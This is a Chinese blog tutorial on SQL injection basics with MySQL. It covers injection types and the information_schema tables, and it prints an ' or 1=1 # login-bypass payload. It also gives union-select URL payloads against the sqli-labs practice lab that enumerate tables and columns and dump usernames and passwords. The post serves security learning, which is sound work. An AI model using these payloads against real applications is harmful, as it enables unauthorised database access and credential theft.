SQL注入——MySQL数据库基础

最新推荐文章于 2024-03-17 12:15:00 发布
最新推荐文章于 2024-03-17 12:15:00 发布
阅读量179 收藏
点赞数 6
分类专栏: SQL注入篇 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cldimd/article/details/104969835
版权

SQL注入原理

  • SQL注入漏洞的本质
  • 把用户输入的数据当做代码来执行,违背了“数据与代码分离”的原则
  • SQL注入漏洞有两个关键条件
  • 用户能控制输入的内容
  • Web应用把用户输入的内容带入到数据库中执行

SQL注入漏洞危害

  • 拖库
  • get  shell

万能密码

  • SELECT * FROM admin WHERE Username='user' and Password='pass'
  • SELECT * FROM admin WHERE Username='1' or 1=1 # and Password='pass'

SQL注入分类

  • 根据请求方式不同
  • GET方式请求注入
  • POST方式请求注入
  • 根据sql注入点的参数类型
  • 整数型注入
  • 字符型注入
  • 搜索型
  • 根据sql注入点的反馈类型
  • union类型的sql注入     联合查询注入
  • 基于错误显示的sql注入   报错注入
  • 布尔类型的sql注入       布尔注入
  • 基于时间的sql注入      延时注入
  • 根据web应用常用的数据库类型
  • Mysql数据库注入
  • SQLServer数据库注入
  • Oracle数据库注入
  • Access数据库注入
  • Mongodb
  • 根据sql语句类型分类
  • Select
  • Insert/update
  • delete

msyql数据库基础操作:

基础常用命令

  • mysql -uroot -p 密码

information数据库

  • Schemata         
  • schema_name
  • Tables
  • table_schema  
  • table_name
  • select table_name from tables where table_schema='dvwa’;
  • select table_name from tables where
  • table_schema='security';
  • columns
  • TABLE_SCHEMA   
  • TABLE_NAME  
  • COLUMN_NAME   字段名

爆数据表

  • http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3

爆字段

  • http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users'  ),3

数据拖库

  • http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3
IT—INTEREST_挪吒
关注
  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入基础一----数据库语法
qq_41759633的博客
08-04 160
创建数据库: CREATE DATABASE ww1 CHARSET=GBK;//创建一个名为ww1的数据库编码格式为GBK; 创建数据库表; CREATE TABLE ww2( //创建一张名为ww2的表 “(” 表示在该表中添加字段 ->id int(11) not null primary key auto_increment, //not null 表示该字段不能为空 prima...
SQL数据库注入基础
weixin_46831054的博客
02-16 511
一、MYSQL基础操作 1.链接数据库 方法一: 在数据库bin文件下输入登录命令: mysql -h ip -u root -p 出现“Enter password:"后输入你所设置的密码,回车 2.展示数据库中所有数据库名称 show databases;SOL命令以分号为结束符 3.新建数据库 create database 数据库名; 这里创建的数据库为stu 4.使用数据库 use 数据库名; 5.在数据库stu中创建表单result create table result(id int(12
SQL注入基础
weixin_45427676的博客
10-21 881
文章目录SQL注入简介基本类型一、union注入(Less-1)(1)基础知识(2)注入过程1、判断是否存在注入2、判断字段3、判断回显位4、查询数据库5、查询表名6、查询表中的列7、查询用户及密码二、boolean注入(Less-8)(1)基础知识(2)注入过程 SQL注入简介 通过把SQL命令插入到Web表单或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,SQL注入目前黑客
SQL注入详解(主要针对MySQL)
Rockboy777的博客
08-09 464
权限不足时也受影响;join绕过,如:union select 1,2,3 -> union select from (select 1)a join (select 2) join (select 3)substr()和mid()使用from for,如substr(database() from 1 for 1)表示将字符串从1位置截取长度1,mid()同理。
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
03-17 5326
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
sql注入初学——松风1
08-03
本文将深入探讨SQL注入的基本概念、检测方法以及针对不同数据库类型的识别技术。 首先,让我们从基础开始。在URL中,如`http://www.example.com/xxx.php?id=4`,如果直接在参数`id`后添加一个单引号 `'`,如`...
PHP+MysqlSQL注入源码 下载
01-01
这个"PHP+MysqlSQL注入源码 下载"的主题涉及到一个常见的安全问题——SQL注入,以及如何处理和预防这种情况。下面将详细讨论SQL注入、PHP与MySQL的结合使用,以及如何防范SQL注入。 **SQL注入** SQL注入是一种...
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
数据库——玩转SQL语句(以MySQL为例)
12-14
本文将以MySQL数据库为例,讲解如何运用SQL进行基本的数据操作。 **一、数据操作** 1. **插入数据**: - `INSERT INTO` 语句用于向表中插入新记录。例如,要在 `departments` 表中插入一个新的部门,可以使用: ...
sql注入数据库操作基础
m0_64338210的博客
02-13 697
连接数据库 输入命令:mysql -u root -p 显示系统中所有数据库名称 输入命令:show databases; 新建数据库student 命令:create database student; 查看结果:show databases; 使用数据库student 命令:use student; 在数据库student中创建表result 命令:create table result(id int(8),name varchar(20),city varchar(20),s..
Mysql注入 -- 报错注入
weixin_41489908的博客
05-20 741
​时刻清零,不要老把自己的一套拿出来。。。 ---- 网易云热评 一、常用函数 1、count();统计该列有几条数据 2、rand():产生0-1随机数 3、group by:根据某一列排序,改列必须出现在前面查询的内容 4、floor(1.23):获取小于等于该值的最大整数 5、as:给查询的列名内容重命名 6、concat(1,2,3):将里面的内容连接在一起 二、实例演示 1、获取当前数据库名称 http://192.168.139.129/sqli/Less-.
SQL注入mysql显错注入
weixin_34060741的博客
11-12 853
在我们实际渗透中,明明发现一个注入点,本以为丢给sqlmap就可以了,结果sqlmap只显示确实是注入点,但是数据库却获取不了,如图1所示,这时我们可以使用手工进行注入,判断出过滤规则以及基本过滤情况,然后再选择对应的sqlmap脚本(如果有的话),本文主要是讲述如何通过mysql函数报错来进行注入,另外如何使用手工进行全程注入的利用过程,如果你...
新型mysql报错注入
xiaoshan812613234的专栏
08-12 1167
新型mysql报错注入,这种报错注入主要是基于mysql中无符号int数据类型的溢出: 1.查询数据库版本: select 2*(if((select 8 from (select (version()))s),18446744073709551610, 18446744073709551610));=select 1E308*if((select * from (select version
MySQL常见十种报错注入
weixin_52501704的博客
09-28 4043
MySQL常见十种报错注入
关于sql注入这一篇就够了(适合入门)
qq_53105813的博客
01-07 4925
sql注入详解
渗透测试---数据库安全: sql注入数据库原理详解
有勇气的牛排博客
02-12 4107
文章目录1 介绍2 一般步骤3 注入3 函数3.1 常用的系统函数3.2 字符串连接函数3.2.1 concat() 函数3.2.2 concat_ws() 函数3.2.3 group_concat() 函数4 注入4.1 联合查询 union 注入4.2 information_schema 注入5.2.1 获取所有数据库4.2.2 获取指定数据库的表4.2.3 获取指定表的字段名4.2.4 获取字段值得内容4.3 基于报错信息注入4.3.1 三个常用报错函数4.4 数字注入4.5 搜索注入5 sql注入
SQL注入
热门推荐
m0_51457307的博客
11-08 2万+
一、什么是SQL注入 SQL注入(SQL lnjection)是发生在Web程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至修改数据库。也就是说,SQL注入就是在用户输入的字符串中添加SQL语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的SQL语句就会被数据库服务器误认为是正常的SQL语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。 二、SQL注入的原理 1.恶意拼接查

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值